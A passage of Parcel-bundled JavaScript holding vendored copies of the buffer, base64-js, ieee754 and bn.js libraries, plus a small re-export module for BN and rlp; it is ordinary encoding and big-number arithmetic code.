    let i = val.length;
    const start = val[0] === "-" ? 1 : 0;
    for(; i >= start + 4; i -= 3)res = `_${val.slice(i - 3, i)}${res}`;
    return `${val.slice(0, i)}${res}`;
}
// CHECK FUNCTIONS
// ===============
function $51861dfc7ca9d588$var$checkBounds(buf, offset, byteLength) {
    $51861dfc7ca9d588$var$validateNumber(offset, "offset");
    if (buf[offset] === undefined || buf[offset + byteLength] === undefined) $51861dfc7ca9d588$var$boundsError(offset, buf.length - (byteLength + 1));
}
function $51861dfc7ca9d588$var$checkIntBI(value, min, max, buf, offset, byteLength) {
    if (value > max || value < min) {
        const n = typeof min === "bigint" ? "n" : "";
        let range;
        if (byteLength > 3) {
            if (min === 0 || min === BigInt(0)) range = `>= 0${n} and < 2${n} ** ${(byteLength + 1) * 8}${n}`;
            else range = `>= -(2${n} ** ${(byteLength + 1) * 8 - 1}${n}) and < 2 ** ` + `${(byteLength + 1) * 8 - 1}${n}`;
        } else range = `>= ${min}${n} and <= ${max}${n}`;
        throw new $51861dfc7ca9d588$var$errors.ERR_OUT_OF_RANGE("value", range, value);
    }
    $51861dfc7ca9d588$var$checkBounds(buf, offset, byteLength);
}
function $51861dfc7ca9d588$var$validateNumber(value, name) {
    if (typeof value !== "number") throw new $51861dfc7ca9d588$var$errors.ERR_INVALID_ARG_TYPE(name, "number", value);
}
function $51861dfc7ca9d588$var$boundsError(value, length, type) {
    if (Math.floor(value) !== value) {
        $51861dfc7ca9d588$var$validateNumber(value, type);
        throw new $51861dfc7ca9d588$var$errors.ERR_OUT_OF_RANGE(type || "offset", "an integer", value);
    }
    if (length < 0) throw new $51861dfc7ca9d588$var$errors.ERR_BUFFER_OUT_OF_BOUNDS();
    throw new $51861dfc7ca9d588$var$errors.ERR_OUT_OF_RANGE(type || "offset", `>= ${type ? 1 : 0} and <= ${length}`, value);
}
// HELPER FUNCTIONS
// ================
const $51861dfc7ca9d588$var$INVALID_BASE64_RE = /[^+/0-9A-Za-z-_]/g;
function $51861dfc7ca9d588$var$base64clean(str) {
    // Node takes equal signs as end of the Base64 encoding
    str = str.split("=")[0];
    // Node strips out invalid characters like \n and \t from the string, base64-js does not
    str = str.trim().replace($51861dfc7ca9d588$var$INVALID_BASE64_RE, "");
    // Node converts strings with length < 2 to ''
    if (str.length < 2) return "";
    // Node allows for non-padded base64 strings (missing trailing ===), base64-js does not
    while(str.length % 4 !== 0)str = str + "=";
    return str;
}
function $51861dfc7ca9d588$var$utf8ToBytes(string, units) {
    units = units || Infinity;
    let codePoint;
    const length = string.length;
    let leadSurrogate = null;
    const bytes = [];
    for(let i = 0; i < length; ++i){
        codePoint = string.charCodeAt(i);
        // is surrogate component
        if (codePoint > 0xD7FF && codePoint < 0xE000) {
            // last char was a lead
            if (!leadSurrogate) {
                // no lead yet
                if (codePoint > 0xDBFF) {
                    // unexpected trail
                    if ((units -= 3) > -1) bytes.push(0xEF, 0xBF, 0xBD);
                    continue;
                } else if (i + 1 === length) {
                    // unpaired lead
                    if ((units -= 3) > -1) bytes.push(0xEF, 0xBF, 0xBD);
                    continue;
                }
                // valid lead
                leadSurrogate = codePoint;
                continue;
            }
            // 2 leads in a row
            if (codePoint < 0xDC00) {
                if ((units -= 3) > -1) bytes.push(0xEF, 0xBF, 0xBD);
                leadSurrogate = codePoint;
                continue;
            }
            // valid surrogate pair
            codePoint = (leadSurrogate - 0xD800 << 10 | codePoint - 0xDC00) + 0x10000;
        } else if (leadSurrogate) // valid bmp char, but last char was a lead
        {
            if ((units -= 3) > -1) bytes.push(0xEF, 0xBF, 0xBD);
        }
        leadSurrogate = null;
        // encode utf8
        if (codePoint < 0x80) {
            if ((units -= 1) < 0) break;
            bytes.push(codePoint);
        } else if (codePoint < 0x800) {
            if ((units -= 2) < 0) break;
            bytes.push(codePoint >> 0x6 | 0xC0, codePoint & 0x3F | 0x80);
        } else if (codePoint < 0x10000) {
            if ((units -= 3) < 0) break;
            bytes.push(codePoint >> 0xC | 0xE0, codePoint >> 0x6 & 0x3F | 0x80, codePoint & 0x3F | 0x80);
        } else if (codePoint < 0x110000) {
            if ((units -= 4) < 0) break;
            bytes.push(codePoint >> 0x12 | 0xF0, codePoint >> 0xC & 0x3F | 0x80, codePoint >> 0x6 & 0x3F | 0x80, codePoint & 0x3F | 0x80);
        } else throw new Error("Invalid code point");
    }
    return bytes;
}
function $51861dfc7ca9d588$var$asciiToBytes(str) {
    const byteArray = [];
    for(let i = 0; i < str.length; ++i)// Node's code seems to be doing this and not & 0x7F..
    byteArray.push(str.charCodeAt(i) & 0xFF);
    return byteArray;
}
function $51861dfc7ca9d588$var$utf16leToBytes(str, units) {
    let c, hi, lo;
    const byteArray = [];
    for(let i = 0; i < str.length; ++i){
        if ((units -= 2) < 0) break;
        c = str.charCodeAt(i);
        hi = c >> 8;
        lo = c % 256;
        byteArray.push(lo);
        byteArray.push(hi);
    }
    return byteArray;
}
function $51861dfc7ca9d588$var$base64ToBytes(str) {
    return $kuxul.toByteArray($51861dfc7ca9d588$var$base64clean(str));
}
function $51861dfc7ca9d588$var$blitBuffer(src, dst, offset, length) {
    let i;
    for(i = 0; i < length; ++i){
        if (i + offset >= dst.length || i >= src.length) break;
        dst[i + offset] = src[i];
    }
    return i;
}
// ArrayBuffer or Uint8Array objects from other contexts (i.e. iframes) do not pass
// the `instanceof` check but they should be treated as of that type.
// See: https://github.com/feross/buffer/issues/166
function $51861dfc7ca9d588$var$isInstance(obj, type) {
    return obj instanceof type || obj != null && obj.constructor != null && obj.constructor.name != null && obj.constructor.name === type.name;
}
function $51861dfc7ca9d588$var$numberIsNaN(obj) {
    // For IE11 support
    return obj !== obj // eslint-disable-line no-self-compare
    ;
}
// Create lookup table for `toString('hex')`
// See: https://github.com/feross/buffer/issues/219
const $51861dfc7ca9d588$var$hexSliceLookupTable = function() {
    const alphabet = "0123456789abcdef";
    const table = new Array(256);
    for(let i = 0; i < 16; ++i){
        const i16 = i * 16;
        for(let j = 0; j < 16; ++j)table[i16 + j] = alphabet[i] + alphabet[j];
    }
    return table;
}();
// Return not function with Error if BigInt not supported
function $51861dfc7ca9d588$var$defineBigIntMethod(fn) {
    return typeof BigInt === "undefined" ? $51861dfc7ca9d588$var$BufferBigIntNotDefined : fn;
}
function $51861dfc7ca9d588$var$BufferBigIntNotDefined() {
    throw new Error("BigInt not supported");
}

});
parcelRequire.register("kuxul", function(module, exports) {

$parcel$export(module.exports, "toByteArray", () => $eeb0961446aae8e3$export$d622b2ad8d90c771, (v) => $eeb0961446aae8e3$export$d622b2ad8d90c771 = v);
$parcel$export(module.exports, "fromByteArray", () => $eeb0961446aae8e3$export$6100ba28696e12de, (v) => $eeb0961446aae8e3$export$6100ba28696e12de = v);
var $eeb0961446aae8e3$export$a48f0734ac7c2329;
var $eeb0961446aae8e3$export$d622b2ad8d90c771;
var $eeb0961446aae8e3$export$6100ba28696e12de;
"use strict";
$eeb0961446aae8e3$export$a48f0734ac7c2329 = $eeb0961446aae8e3$var$byteLength;
$eeb0961446aae8e3$export$d622b2ad8d90c771 = $eeb0961446aae8e3$var$toByteArray;
$eeb0961446aae8e3$export$6100ba28696e12de = $eeb0961446aae8e3$var$fromByteArray;
var $eeb0961446aae8e3$var$lookup = [];
var $eeb0961446aae8e3$var$revLookup = [];
var $eeb0961446aae8e3$var$Arr = typeof Uint8Array !== "undefined" ? Uint8Array : Array;
var $eeb0961446aae8e3$var$code = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
for(var $eeb0961446aae8e3$var$i = 0, $eeb0961446aae8e3$var$len = $eeb0961446aae8e3$var$code.length; $eeb0961446aae8e3$var$i < $eeb0961446aae8e3$var$len; ++$eeb0961446aae8e3$var$i){
    $eeb0961446aae8e3$var$lookup[$eeb0961446aae8e3$var$i] = $eeb0961446aae8e3$var$code[$eeb0961446aae8e3$var$i];
    $eeb0961446aae8e3$var$revLookup[$eeb0961446aae8e3$var$code.charCodeAt($eeb0961446aae8e3$var$i)] = $eeb0961446aae8e3$var$i;
}
// Support decoding URL-safe base64 strings, as Node.js does.
// See: https://en.wikipedia.org/wiki/Base64#URL_applications
$eeb0961446aae8e3$var$revLookup["-".charCodeAt(0)] = 62;
$eeb0961446aae8e3$var$revLookup["_".charCodeAt(0)] = 63;
function $eeb0961446aae8e3$var$getLens(b64) {
    var len = b64.length;
    if (len % 4 > 0) throw new Error("Invalid string. Length must be a multiple of 4");
    // Trim off extra bytes after placeholder bytes are found
    // See: https://github.com/beatgammit/base64-js/issues/42
    var validLen = b64.indexOf("=");
    if (validLen === -1) validLen = len;
    var placeHoldersLen = validLen === len ? 0 : 4 - validLen % 4;
    return [
        validLen,
        placeHoldersLen
    ];
}
// base64 is 4/3 + up to two characters of the original data
function $eeb0961446aae8e3$var$byteLength(b64) {
    var lens = $eeb0961446aae8e3$var$getLens(b64);
    var validLen = lens[0];
    var placeHoldersLen = lens[1];
    return (validLen + placeHoldersLen) * 3 / 4 - placeHoldersLen;
}
function $eeb0961446aae8e3$var$_byteLength(b64, validLen, placeHoldersLen) {
    return (validLen + placeHoldersLen) * 3 / 4 - placeHoldersLen;
}
function $eeb0961446aae8e3$var$toByteArray(b64) {
    var tmp;
    var lens = $eeb0961446aae8e3$var$getLens(b64);
    var validLen = lens[0];
    var placeHoldersLen = lens[1];
    var arr = new $eeb0961446aae8e3$var$Arr($eeb0961446aae8e3$var$_byteLength(b64, validLen, placeHoldersLen));
    var curByte = 0;
    // if there are placeholders, only get up to the last complete 4 chars
    var len = placeHoldersLen > 0 ? validLen - 4 : validLen;
    var i;
    for(i = 0; i < len; i += 4){
        tmp = $eeb0961446aae8e3$var$revLookup[b64.charCodeAt(i)] << 18 | $eeb0961446aae8e3$var$revLookup[b64.charCodeAt(i + 1)] << 12 | $eeb0961446aae8e3$var$revLookup[b64.charCodeAt(i + 2)] << 6 | $eeb0961446aae8e3$var$revLookup[b64.charCodeAt(i + 3)];
        arr[curByte++] = tmp >> 16 & 0xFF;
        arr[curByte++] = tmp >> 8 & 0xFF;
        arr[curByte++] = tmp & 0xFF;
    }
    if (placeHoldersLen === 2) {
        tmp = $eeb0961446aae8e3$var$revLookup[b64.charCodeAt(i)] << 2 | $eeb0961446aae8e3$var$revLookup[b64.charCodeAt(i + 1)] >> 4;
        arr[curByte++] = tmp & 0xFF;
    }
    if (placeHoldersLen === 1) {
        tmp = $eeb0961446aae8e3$var$revLookup[b64.charCodeAt(i)] << 10 | $eeb0961446aae8e3$var$revLookup[b64.charCodeAt(i + 1)] << 4 | $eeb0961446aae8e3$var$revLookup[b64.charCodeAt(i + 2)] >> 2;
        arr[curByte++] = tmp >> 8 & 0xFF;
        arr[curByte++] = tmp & 0xFF;
    }
    return arr;
}
function $eeb0961446aae8e3$var$tripletToBase64(num) {
    return $eeb0961446aae8e3$var$lookup[num >> 18 & 0x3F] + $eeb0961446aae8e3$var$lookup[num >> 12 & 0x3F] + $eeb0961446aae8e3$var$lookup[num >> 6 & 0x3F] + $eeb0961446aae8e3$var$lookup[num & 0x3F];
}
function $eeb0961446aae8e3$var$encodeChunk(uint8, start, end) {
    var tmp;
    var output = [];
    for(var i = start; i < end; i += 3){
        tmp = (uint8[i] << 16 & 0xFF0000) + (uint8[i + 1] << 8 & 0xFF00) + (uint8[i + 2] & 0xFF);
        output.push($eeb0961446aae8e3$var$tripletToBase64(tmp));
    }
    return output.join("");
}
function $eeb0961446aae8e3$var$fromByteArray(uint8) {
    var tmp;
    var len = uint8.length;
    var extraBytes = len % 3 // if we have 1 byte left, pad 2 bytes
    ;
    var parts = [];
    var maxChunkLength = 16383 // must be multiple of 3
    ;
    // go through the array every three bytes, we'll deal with trailing stuff later
    for(var i = 0, len2 = len - extraBytes; i < len2; i += maxChunkLength)parts.push($eeb0961446aae8e3$var$encodeChunk(uint8, i, i + maxChunkLength > len2 ? len2 : i + maxChunkLength));
    // pad the end with zeros, but make sure to not forget the extra bytes
    if (extraBytes === 1) {
        tmp = uint8[len - 1];
        parts.push($eeb0961446aae8e3$var$lookup[tmp >> 2] + $eeb0961446aae8e3$var$lookup[tmp << 4 & 0x3F] + "==");
    } else if (extraBytes === 2) {
        tmp = (uint8[len - 2] << 8) + uint8[len - 1];
        parts.push($eeb0961446aae8e3$var$lookup[tmp >> 10] + $eeb0961446aae8e3$var$lookup[tmp >> 4 & 0x3F] + $eeb0961446aae8e3$var$lookup[tmp << 2 & 0x3F] + "=");
    }
    return parts.join("");
}

});

parcelRequire.register("9NvM5", function(module, exports) {

$parcel$export(module.exports, "read", () => $7221566bd4d49f44$export$aafa59e2e03f2942, (v) => $7221566bd4d49f44$export$aafa59e2e03f2942 = v);
$parcel$export(module.exports, "write", () => $7221566bd4d49f44$export$68d8715fc104d294, (v) => $7221566bd4d49f44$export$68d8715fc104d294 = v);
/*! ieee754. BSD-3-Clause License. Feross Aboukhadijeh <https://feross.org/opensource> */ var $7221566bd4d49f44$export$aafa59e2e03f2942;
var $7221566bd4d49f44$export$68d8715fc104d294;
$7221566bd4d49f44$export$aafa59e2e03f2942 = function(buffer, offset, isLE, mLen, nBytes) {
    var e, m;
    var eLen = nBytes * 8 - mLen - 1;
    var eMax = (1 << eLen) - 1;
    var eBias = eMax >> 1;
    var nBits = -7;
    var i = isLE ? nBytes - 1 : 0;
    var d = isLE ? -1 : 1;
    var s = buffer[offset + i];
    i += d;
    e = s & (1 << -nBits) - 1;
    s >>= -nBits;
    nBits += eLen;
    for(; nBits > 0; e = e * 256 + buffer[offset + i], i += d, nBits -= 8);
    m = e & (1 << -nBits) - 1;
    e >>= -nBits;
    nBits += mLen;
    for(; nBits > 0; m = m * 256 + buffer[offset + i], i += d, nBits -= 8);
    if (e === 0) e = 1 - eBias;
    else if (e === eMax) return m ? NaN : (s ? -1 : 1) * Infinity;
    else {
        m = m + Math.pow(2, mLen);
        e = e - eBias;
    }
    return (s ? -1 : 1) * m * Math.pow(2, e - mLen);
};
$7221566bd4d49f44$export$68d8715fc104d294 = function(buffer, value, offset, isLE, mLen, nBytes) {
    var e, m, c;
    var eLen = nBytes * 8 - mLen - 1;
    var eMax = (1 << eLen) - 1;
    var eBias = eMax >> 1;
    var rt = mLen === 23 ? Math.pow(2, -24) - Math.pow(2, -77) : 0;
    var i = isLE ? 0 : nBytes - 1;
    var d = isLE ? 1 : -1;
    var s = value < 0 || value === 0 && 1 / value < 0 ? 1 : 0;
    value = Math.abs(value);
    if (isNaN(value) || value === Infinity) {
        m = isNaN(value) ? 1 : 0;
        e = eMax;
    } else {
        e = Math.floor(Math.log(value) / Math.LN2);
        if (value * (c = Math.pow(2, -e)) < 1) {
            e--;
            c *= 2;
        }
        if (e + eBias >= 1) value += rt / c;
        else value += rt * Math.pow(2, 1 - eBias);
        if (value * c >= 2) {
            e++;
            c /= 2;
        }
        if (e + eBias >= eMax) {
            m = 0;
            e = eMax;
        } else if (e + eBias >= 1) {
            m = (value * c - 1) * Math.pow(2, mLen);
            e = e + eBias;
        } else {
            m = value * Math.pow(2, eBias - 1) * Math.pow(2, mLen);
            e = 0;
        }
    }
    for(; mLen >= 8; buffer[offset + i] = m & 0xff, i += d, m /= 256, mLen -= 8);
    e = e << mLen | m;
    eLen += mLen;
    for(; eLen > 0; buffer[offset + i] = e & 0xff, i += d, e /= 256, eLen -= 8);
    buffer[offset + i - d] |= s * 128;
};

});


parcelRequire.register("4jhio", function(module, exports) {
"use strict";
/**
 * Re-exports commonly used modules:
 * * Exports [`BN`](https://github.com/indutny/bn.js), [`rlp`](https://github.com/ethereumjs/rlp).
 * @packageDocumentation
 */ var $32365a58f62e9fb8$var$__createBinding = module.exports && module.exports.__createBinding || (Object.create ? function(o, m, k, k2) {
    if (k2 === undefined) k2 = k;
    var desc = Object.getOwnPropertyDescriptor(m, k);
    if (!desc || ("get" in desc ? !m.__esModule : desc.writable || desc.configurable)) desc = {
        enumerable: true,
        get: function() {
            return m[k];
        }
    };
    Object.defineProperty(o, k2, desc);
} : function(o, m, k, k2) {
    if (k2 === undefined) k2 = k;
    o[k2] = m[k];
});
var $32365a58f62e9fb8$var$__setModuleDefault = module.exports && module.exports.__setModuleDefault || (Object.create ? function(o, v) {
    Object.defineProperty(o, "default", {
        enumerable: true,
        value: v
    });
} : function(o, v) {
    o["default"] = v;
});
var $32365a58f62e9fb8$var$__importStar = module.exports && module.exports.__importStar || function(mod) {
    if (mod && mod.__esModule) return mod;
    var result = {};
    if (mod != null) {
        for(var k in mod)if (k !== "default" && Object.prototype.hasOwnProperty.call(mod, k)) $32365a58f62e9fb8$var$__createBinding(result, mod, k);
    }
    $32365a58f62e9fb8$var$__setModuleDefault(result, mod);
    return result;
};
var $32365a58f62e9fb8$var$__importDefault = module.exports && module.exports.__importDefault || function(mod) {
    return mod && mod.__esModule ? mod : {
        "default": mod
    };
};
Object.defineProperty(module.exports, "__esModule", {
    value: true
});
module.exports.rlp = module.exports.BN = void 0;

var $32365a58f62e9fb8$var$bn_js_1 = $32365a58f62e9fb8$var$__importDefault((parcelRequire("dEXSZ")));
module.exports.BN = $32365a58f62e9fb8$var$bn_js_1.default;

var $32365a58f62e9fb8$var$rlp = $32365a58f62e9fb8$var$__importStar((parcelRequire("jAvDX")));
module.exports.rlp = $32365a58f62e9fb8$var$rlp;

});
parcelRequire.register("dEXSZ", function(module, exports) {

(function(module1, exports) {
    "use strict";
    // Utils
    function assert(val, msg) {
        if (!val) throw new Error(msg || "Assertion failed");
    }
    // Could use `inherits` module, but don't want to move from single file
    // architecture yet.
    function inherits(ctor, superCtor) {
        ctor.super_ = superCtor;
        var TempCtor = function() {};
        TempCtor.prototype = superCtor.prototype;
        ctor.prototype = new TempCtor();
        ctor.prototype.constructor = ctor;
    }
    // BN
    function BN(number, base, endian) {
        if (BN.isBN(number)) return number;
        this.negative = 0;
        this.words = null;
        this.length = 0;
        // Reduction context
        this.red = null;
        if (number !== null) {
            if (base === "le" || base === "be") {
                endian = base;
                base = 10;
            }
            this._init(number || 0, base || 10, endian || "be");
        }
    }
    if (typeof module1 === "object") module1.exports = BN;
    else exports.BN = BN;
    BN.BN = BN;
    BN.wordSize = 26;
    var Buffer;
    try {
        if (typeof window !== "undefined" && typeof window.Buffer !== "undefined") Buffer = window.Buffer;
        else Buffer = (parcelRequire("kjyEk")).Buffer;
    } catch (e) {}
    BN.isBN = function isBN(num) {
        if (num instanceof BN) return true;
        return num !== null && typeof num === "object" && num.constructor.wordSize === BN.wordSize && Array.isArray(num.words);
    };
    BN.max = function max(left, right) {
        if (left.cmp(right) > 0) return left;
        return right;
    };
    BN.min = function min(left, right) {
        if (left.cmp(right) < 0) return left;
        return right;
    };
    BN.prototype._init = function init(number, base, endian) {
        if (typeof number === "number") return this._initNumber(number, base, endian);
        if (typeof number === "object") return this._initArray(number, base, endian);
        if (base === "hex") base = 16;
        assert(base === (base | 0) && base >= 2 && base <= 36);
        number = number.toString().replace(/\s+/g, "");
        var start = 0;
        if (number[0] === "-") {
            start++;
            this.negative = 1;
        }
        if (start < number.length) {
            if (base === 16) this._parseHex(number, start, endian);
            else {
                this._parseBase(number, base, start);
                if (endian === "le") this._initArray(this.toArray(), base, endian);
            }
        }
    };
    BN.prototype._initNumber = function _initNumber(number, base, endian) {
        if (number < 0) {
            this.negative = 1;
            number = -number;
        }
        if (number < 0x4000000) {
            this.words = [
                number & 0x3ffffff
            ];
            this.length = 1;
        } else if (number < 0x10000000000000) {
            this.words = [
                number & 0x3ffffff,
                number / 0x4000000 & 0x3ffffff
            ];
            this.length = 2;
        } else {
            assert(number < 0x20000000000000); // 2 ^ 53 (unsafe)
            this.words = [
                number & 0x3ffffff,
                number / 0x4000000 & 0x3ffffff,
                1
            ];
            this.length = 3;
        }
        if (endian !== "le") return;
        // Reverse the bytes
        this._initArray(this.toArray(), base, endian);
    };
    BN.prototype._initArray = function _initArray(number, base, endian) {
        // Perhaps a Uint8Array
        assert(typeof number.length === "number");
        if (number.length <= 0) {
            this.words = [
                0
            ];
            this.length = 1;
            return this;
        }
        this.length = Math.ceil(number.length / 3);
        this.words = new Array(this.length);
        for(var i = 0; i < this.length; i++)this.words[i] = 0;
        var j, w;
        var off = 0;
        if (endian === "be") for(i = number.length - 1, j = 0; i >= 0; i -= 3){
            w = number[i] | number[i - 1] << 8 | number[i - 2] << 16;
            this.words[j] |= w << off & 0x3ffffff;
            this.words[j + 1] = w >>> 26 - off & 0x3ffffff;
            off += 24;
            if (off >= 26) {
                off -= 26;
                j++;
            }
        }
        else if (endian === "le") for(i = 0, j = 0; i < number.length; i += 3){
            w = number[i] | number[i + 1] << 8 | number[i + 2] << 16;
            this.words[j] |= w << off & 0x3ffffff;
            this.words[j + 1] = w >>> 26 - off & 0x3ffffff;
            off += 24;
            if (off >= 26) {
                off -= 26;
                j++;
            }
        }
        return this._strip();
    };
    function parseHex4Bits(string, index) {
        var c = string.charCodeAt(index);
        // '0' - '9'
        if (c >= 48 && c <= 57) return c - 48;
        else if (c >= 65 && c <= 70) return c - 55;
        else if (c >= 97 && c <= 102) return c - 87;
        else assert(false, "Invalid character in " + string);
    }
    function parseHexByte(string, lowerBound, index) {
        var r = parseHex4Bits(string, index);
        if (index - 1 >= lowerBound) r |= parseHex4Bits(string, index - 1) << 4;
        return r;
    }
    BN.prototype._parseHex = function _parseHex(number, start, endian) {
        // Create possibly bigger array to ensure that it fits the number
        this.length = Math.ceil((number.length - start) / 6);
        this.words = new Array(this.length);
        for(var i = 0; i < this.length; i++)this.words[i] = 0;
        // 24-bits chunks
        var off = 0;
        var j = 0;
        var w;
        if (endian === "be") for(i = number.length - 1; i >= start; i -= 2){
            w = parseHexByte(number, start, i) << off;
            this.words[j] |= w & 0x3ffffff;
            if (off >= 18) {
                off -= 18;
                j += 1;
                this.words[j] |= w >>> 26;
            } else off += 8;
        }
        else {
            var parseLength = number.length - start;
            for(i = parseLength % 2 === 0 ? start + 1 : start; i < number.length; i += 2){
                w = parseHexByte(number, start, i) << off;
                this.words[j] |= w & 0x3ffffff;
                if (off >= 18) {
                    off -= 18;
                    j += 1;
                    this.words[j] |= w >>> 26;
                } else off += 8;
            }
        }
        this._strip();
    };
    function parseBase(str, start, end, mul) {
        var r = 0;
        var b = 0;
        var len = Math.min(str.length, end);
        for(var i = start; i < len; i++){
            var c = str.charCodeAt(i) - 48;
            r *= mul;
            // 'a'
            if (c >= 49) b = c - 49 + 0xa;
            else if (c >= 17) b = c - 17 + 0xa;
            else b = c;
            assert(c >= 0 && b < mul, "Invalid character");
            r += b;
        }
        return r;
    }
    BN.prototype._parseBase = function _parseBase(number, base, start) {
        // Initialize as zero
        this.words = [
            0
        ];
        this.length = 1;
        // Find length of limb in base
        for(var limbLen = 0, limbPow = 1; limbPow <= 0x3ffffff; limbPow *= base)limbLen++;
        limbLen--;
        limbPow = limbPow / base | 0;
        var total = number.length - start;
        var mod = total % limbLen;
        var end = Math.min(total, total - mod) + start;
        var word = 0;
        for(var i = start; i < end; i += limbLen){
            word = parseBase(number, i, i + limbLen, base);
            this.imuln(limbPow);
            if (this.words[0] + word < 0x4000000) this.words[0] += word;
            else this._iaddn(word);
        }
        if (mod !== 0) {
            var pow = 1;
            word = parseBase(number, i, number.length, base);
            for(i = 0; i < mod; i++)pow *= base;
            this.imuln(pow);
            if (this.words[0] + word < 0x4000000) this.words[0] += word;
            else this._iaddn(word);
        }
        this._strip();
    };
    BN.prototype.copy = function copy(dest) {
        dest.words = new Array(this.length);
        for(var i = 0; i < this.length; i++)dest.words[i] = this.words[i];
        dest.length = this.length;
        dest.negative = this.negative;
        dest.red = this.red;
    };
    function move(dest, src) {
        dest.words = src.words;
        dest.length = src.length;
        dest.negative = src.negative;
        dest.red = src.red;
    }
    BN.prototype._move = function _move(dest) {
        move(dest, this);
    };
    BN.prototype.clone = function clone() {
        var r = new BN(null);
        this.copy(r);
        return r;
    };
    BN.prototype._expand = function _expand(size) {
        while(this.length < size)this.words[this.length++] = 0;
        return this;
    };
    // Remove leading `0` from `this`
    BN.prototype._strip = function strip() {
        while(this.length > 1 && this.words[this.length - 1] === 0)this.length--;
        return this._normSign();
    };
    BN.prototype._normSign = function _normSign() {
        // -0 = 0
        if (this.length === 1 && this.words[0] === 0) this.negative = 0;
        return this;
    };
    // Check Symbol.for because not everywhere where Symbol defined
    // See https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Symbol#Browser_compatibility
    if (typeof Symbol !== "undefined" && typeof Symbol.for === "function") try {
        BN.prototype[Symbol.for("nodejs.util.inspect.custom")] = inspect;
    } catch (e) {
        BN.prototype.inspect = inspect;
    }
    else BN.prototype.inspect = inspect;
    function inspect() {
        return (this.red ? "<BN-R: " : "<BN: ") + this.toString(16) + ">";
    }
    /*

  var zeros = [];
  var groupSizes = [];
  var groupBases = [];

  var s = '';
  var i = -1;
  while (++i < BN.wordSize) {
    zeros[i] = s;
    s += '0';
  }
  groupSizes[0] = 0;
  groupSizes[1] = 0;
  groupBases[0] = 0;
  groupBases[1] = 0;
  var base = 2 - 1;
  while (++base < 36 + 1) {
    var groupSize = 0;
    var groupBase = 1;
    while (groupBase < (1 << BN.wordSize) / base) {
      groupBase *= base;
      groupSize += 1;
    }
    groupSizes[base] = groupSize;
    groupBases[base] = groupBase;
  }

  */ var zeros = [
        "",
        "0",
        "00",
        "000",
        "0000",
        "00000",
        "000000",
        "0000000",
        "00000000",
        "000000000",
        "0000000000",
        "00000000000",
        "000000000000",
        "0000000000000",
        "00000000000000",
        "000000000000000",
        "0000000000000000",
        "00000000000000000",
        "000000000000000000",
        "0000000000000000000",
        "00000000000000000000",
        "000000000000000000000",
        "0000000000000000000000",
        "00000000000000000000000",
        "000000000000000000000000",
        "0000000000000000000000000"
    ];
    var groupSizes = [
        0,
        0,
        25,
        16,
        12,
        11,
        10,
        9,
        8,
        8,
        7,
        7,
        7,
        7,
        6,
        6,
        6,
        6,
        6,
        6,
        6,
        5,
        5,
        5,
        5,
        5,
        5,
        5,
        5,
        5,
        5,
        5,
        5,
        5,
        5,
        5,
        5
    ];
    var groupBases = [
        0,
        0,
        33554432,
        43046721,
        16777216,
        48828125,
        60466176,
        40353607,
        16777216,
        43046721,
        10000000,
        19487171,
        35831808,
        62748517,
        7529536,
        11390625,
        16777216,
        24137569,
        34012224,
        47045881,
        64000000,
        4084101,
        5153632,
        6436343,
        7962624,
        9765625,
        11881376,
        14348907,
        17210368,
        20511149,
        24300000,
        28629151,
        33554432,
        39135393,
        45435424,
        52521875,
        60466176
    ];
    BN.prototype.toString = function toString(base, padding) {
        base = base || 10;
        padding = padding | 0 || 1;
        var out;
        if (base === 16 || base === "hex") {
            out = "";
            var off = 0;
            var carry = 0;
            for(var i = 0; i < this.length; i++){
                var w = this.words[i];
                var word = ((w << off | carry) & 0xffffff).toString(16);
                carry = w >>> 24 - off & 0xffffff;
                off += 2;
                if (off >= 26) {
                    off -= 26;
                    i--;
                }
                if (carry !== 0 || i !== this.length - 1) out = zeros[6 - word.length] + word + out;
                else out = word + out;
            }
            if (carry !== 0) out = carry.toString(16) + out;
            while(out.length % padding !== 0)out = "0" + out;
            if (this.negative !== 0) out = "-" + out;
            return out;
        }
        if (base === (base | 0) && base >= 2 && base <= 36) {
            // var groupSize = Math.floor(BN.wordSize * Math.LN2 / Math.log(base));
            var groupSize = groupSizes[base];
            // var groupBase = Math.pow(base, groupSize);
            var groupBase = groupBases[base];
            out = "";
            var c = this.clone();
            c.negative = 0;
            while(!c.isZero()){
                var r = c.modrn(groupBase).toString(base);
                c = c.idivn(groupBase);
                if (!c.isZero()) out = zeros[groupSize - r.length] + r + out;
                else out = r + out;
            }
            if (this.isZero()) out = "0" + out;
            while(out.length % padding !== 0)out = "0" + out;
            if (this.negative !== 0) out = "-" + out;
            return out;
        }
        assert(false, "Base should be between 2 and 36");
    };
    BN.prototype.toNumber = function toNumber() {
        var ret = this.words[0];
        if (this.length === 2) ret += this.words[1] * 0x4000000;
        else if (this.length === 3 && this.words[2] === 0x01) // NOTE: at this stage it is known that the top bit is set
        ret += 0x10000000000000 + this.words[1] * 0x4000000;
        else if (this.length > 2) assert(false, "Number can only safely store up to 53 bits");
        return this.negative !== 0 ? -ret : ret;
    };
    BN.prototype.toJSON = function toJSON() {
        return this.toString(16, 2);
    };
    if (Buffer) BN.prototype.toBuffer = function toBuffer(endian, length) {
        return this.toArrayLike(Buffer, endian, length);
    };
    BN.prototype.toArray = function toArray(endian, length) {
        return this.toArrayLike(Array, endian, length);
    };
    var allocate = function allocate(ArrayType, size) {
        if (ArrayType.allocUnsafe) return ArrayType.allocUnsafe(size);
        return new ArrayType(size);
    };
    BN.prototype.toArrayLike = function toArrayLike(ArrayType, endian, length) {
        this._strip();
        var byteLength = this.byteLength();
        var reqLength = length || Math.max(1, byteLength);
        assert(byteLength <= reqLength, "byte array longer than desired length");
        assert(reqLength > 0, "Requested array length <= 0");
        var res = allocate(ArrayType, reqLength);
        var postfix = endian === "le" ? "LE" : "BE";
        this["_toArrayLike" + postfix](res, byteLength);
        return res;
    };
    BN.prototype._toArrayLikeLE = function _toArrayLikeLE(res, byteLength) {
        var position = 0;
        var carry = 0;
        for(var i = 0, shift = 0; i < this.length; i++){
            var word = this.words[i] << shift | carry;
            res[position++] = word & 0xff;
            if (position < res.length) res[position++] = word >> 8 & 0xff;
            if (position < res.length) res[position++] = word >> 16 & 0xff;
            if (shift === 6) {
                if (position < res.length) res[position++] = word >> 24 & 0xff;
                carry = 0;
                shift = 0;
            } else {
                carry = word >>> 24;
                shift += 2;
            }
        }
        if (position < res.length) {
            res[position++] = carry;
            while(position < res.length)res[position++] = 0;
        }
    };
